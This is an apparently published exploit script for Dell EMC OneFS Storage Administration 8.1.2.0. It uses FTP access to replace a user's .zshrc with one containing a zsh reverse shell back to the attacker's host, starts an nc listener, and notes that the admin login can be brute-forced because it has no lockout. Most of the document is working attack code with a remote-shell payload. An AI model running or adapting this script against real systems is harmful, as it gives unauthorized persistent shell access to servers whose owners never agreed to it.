DELL EMC OneFS Storage Administration version 8.1.2.0 .zshrc file overwrite exploit that leverages FTP.
05d939bada3fdce437fc73936d2cc27a#!/usr/bin/env python
#
# Exploit name : isilon-onefs-brute.py
# Created date : 9/21/18
# Submit Date : 10/10/18
# Author : wetw0rk
# Python version : 2.7
# Brute Force Script: https://github.com/wetw0rk/Exploit-Development/blob/master/DELL%20EMC%20OneFS%20Storage%20Administration%20%3C%208.1.2.0/isilon-onefs-brute.py
# Vendor Homepage : https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm
# Software Link : https://downloads.emc.com/emc-com/usa/Isilon/EMC_Isilon_OneFS_8.1.2.0_Simulator.zip
# Tested on : DELL EMC OneFS Storage Administration 8.1.2.0
#
# Greetz: Hima (thanks for helping me think of .bashrc), Fr13ndzSec, AbeSnowman, Berserk, Neil
#
# [------------ Timeline ------------]
# 9/21/18 - Contacted Dell PSIRT
# 9/25/18 - Sent POC code
# 10/9/18 - Responded with "not considered a vulnerability"
#
# Description :
# To exploit this vulnerability first you must gain access to the administrative
# interface on 8080 (note no lockouts so you can bruteforce E Z). Once in enable
# FTP like so:
# -> Protocols -> FTP Settings -> Enable the service and transfers -> With that done, exploit!
#
# Since you're dropped in the user home directory and not a secluded FTP directory
# you can inject into .zshrc, however as dell stated you can access other files on
# the system as well....
#
import os
import sys
import socket
import threading
RED = "\033[1m\033[31m[-]\033[0m"
BLUE = "\033[1m\033[94m[*]\033[0m"
GREEN = "\033[1m\033[92m[+]\033[0m"
def background_server(lhost):
global check
fd = open(".zshrc", 'w')
host = "0.0.0.0"
port = 50121
sock = socket.socket(
socket.AF_INET,
socket.SOCK_STREAM
)
sock.bind((host, port))
sock.listen(5)
print("%s listening on %s:%s" % (BLUE, host,port))
while True:
conn, addr = sock.accept()
if check != 1:
zshrc_file = conn.recv(4096)
print("%s generating .zshrc payload" % BLUE)
fd.write(zshrc_file)
# msfvenom -a cmd --platform unix -p cmd/unix/reverse_zsh LHOST=192.168.245.136 LPORT=443 -f raw
fd.write("zsh -c 'zmodload zsh/net/tcp && ztcp %s 443 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' &\n" % lhost)
fd.close()
else:
with open('.zshrc', 'r') as myfile:
data=myfile.read()
conn.send(data)
try:
rhost = sys.argv[1]
rport = int(sys.argv[2])
lhost = sys.argv[3]
username = sys.argv[4]
password = sys.argv[5]
except:
print("Usage: ./%s <rhost> <rport> <lhost> <username> <password>" % sys.argv[0])
print("Example: ./%s 192.168.245.3 21 192.168.245.136 admin admin" % sys.argv[0])
exit(0)
check = 0 # start a background server for download+uploads
server_thread = threading.Thread(target=background_server, args=(lhost,))
server_thread.start()
# create a socket for the client sending the commands
print("%s connecting to %s:%s" % (BLUE, rhost, rport))
csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect((rhost, rport))
csock.recv(4096)
print("%s performing login to OneFS using %s:%s" % (BLUE, username, password))
csock.send("USER %s\r\n" % username)
csock.recv(4096)
csock.send("PASS %s\r\n" % password)
csock.recv(4096)
print("%s login was successful downloading .zshrc" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("RETR .zshrc\r\n")
csock.recv(4096)
csock.send("RNFR .zshrc\r\n")
csock.recv(4096)
print("%s renaming remote .zshrc to .backup" % GREEN)
csock.send("RNTO .backup\r\n")
csock.recv(4096)
check = 1
print("%s uploading payload to target host" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("TYPE I\r\n")
csock.recv(4096)
csock.send("STOR .zshrc\r\n")
print("%s exploitation complete waiting for %s to login" % (GREEN, username))
os.system("nc -lvp 443")
csock.close()